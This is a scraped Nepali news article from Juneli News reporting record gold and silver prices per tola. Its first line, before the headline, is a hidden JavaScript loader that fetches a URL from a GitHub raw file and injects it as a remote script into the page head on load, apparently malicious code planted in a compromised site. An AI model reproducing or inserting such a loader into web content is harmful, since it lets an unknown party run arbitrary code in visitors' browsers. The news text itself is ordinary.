;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज १ लाख १ हजार ४ सय रुपैयाँ पुग्यो सुनको भाउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • आज १ लाख १ हजार ४ सय रुपैयाँ पुग्यो सुनको भाउ
अर्थ/वाणिज्य

आज १ लाख १ हजार ४ सय रुपैयाँ पुग्यो सुनको भाउ

सुनको भनाउ आकाशिएको

साउन २२,

काठमाडौं । सुनको भाउ आज पनि तोलामा ११ सय रुपैयाँ बढेको छ। हिजो तोलामा १६ सयले बढेर १ लाख १ हजार ४ सय रुपैयाँ कायम भएको सुन आज १ लाख २ हजार ५ सय रुपैयाँ पुगेको नेपाल सुन चाँदी व्यवसायी महासंघले जनाएको छ। तेजावी सुनको मूल्य आज तोलामा १ लाख २ हजार रुपैयाँ पुगेको छ। चाँदी पनि आज तोलामा ५० रुपैयाँ महंगो भएको छ। हिजो १२ सय ९५ रुपैयाँ तोला रहेको चाँदीको मूल्यआज १३ सय ४५ रुपैयाँ पुगेको छ। सुन चाँदी दुवैको मूल्य अहिले सम्मकै उच्च हो। file Photo

फेसबुक प्रतिक्रियाहरु